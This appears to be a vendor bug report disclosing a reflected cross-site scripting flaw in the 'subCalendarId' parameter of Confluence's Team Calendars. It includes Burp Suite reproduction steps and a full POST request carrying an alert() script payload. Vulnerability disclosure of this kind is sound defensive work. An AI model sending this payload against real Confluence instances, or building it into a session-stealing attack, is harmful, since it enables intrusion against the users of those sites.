Cross-Site Scripting in subscribetocalendar.action

Type atlassian
Reporter nickmenko
Modified 2018-10-11T08:59:05


{panel:bgColor=#e7f4fa} NOTE: This bug report is for Confluence Server. Using Confluence Cloud? [See the corresponding bug report|]. {panel}

The contents of the 'subCalendarId' parameter is not validated in POST requests to 'subscribetocalendar.action' and is susceptible to cross-site scripting.

Steps to Reproduce:

Start a proxy tool such as Burp Suite.

Log into a Confluence instance with Team Calendars installed.

Use the proxy tool to generate a POST request to '/confluence/calendar/subscribetocalendar.action' with the following payload:

{quote}POST /confluence/calendar/subscribetocalendar.action HTTP/1.1 Host: rgallagher:1990 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://rgallagher:1990/confluence/calendar/subscribetocalendar.action Cookie: confluence-sidebar.width=285; JSESSIONID=E85F825667B40A9201910EE6FF9DF7EA; AJS.conglomerate.cookie="" Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 75

subCalendarId=<script>alert('XSS in subscribetocalendar.action')<%2fscript>{quote}

Ensure that a valid value is sent in the 'JSESSIONID' cookie.

Send the request from Burp Repeater, and view the output in the browser.

The payload sent in the POST body is reflected in the HTTP response, and its JavaScript executes.

We've demonstrated the exploitability using Burp Suite because the customer who reported the vulnerability was unable to include steps to reproduce from the UI. An attacker could exploit this instance of cross-site scripting by inducing a user to click on a link which submits the malicious POST request to the victim's Confluence domain.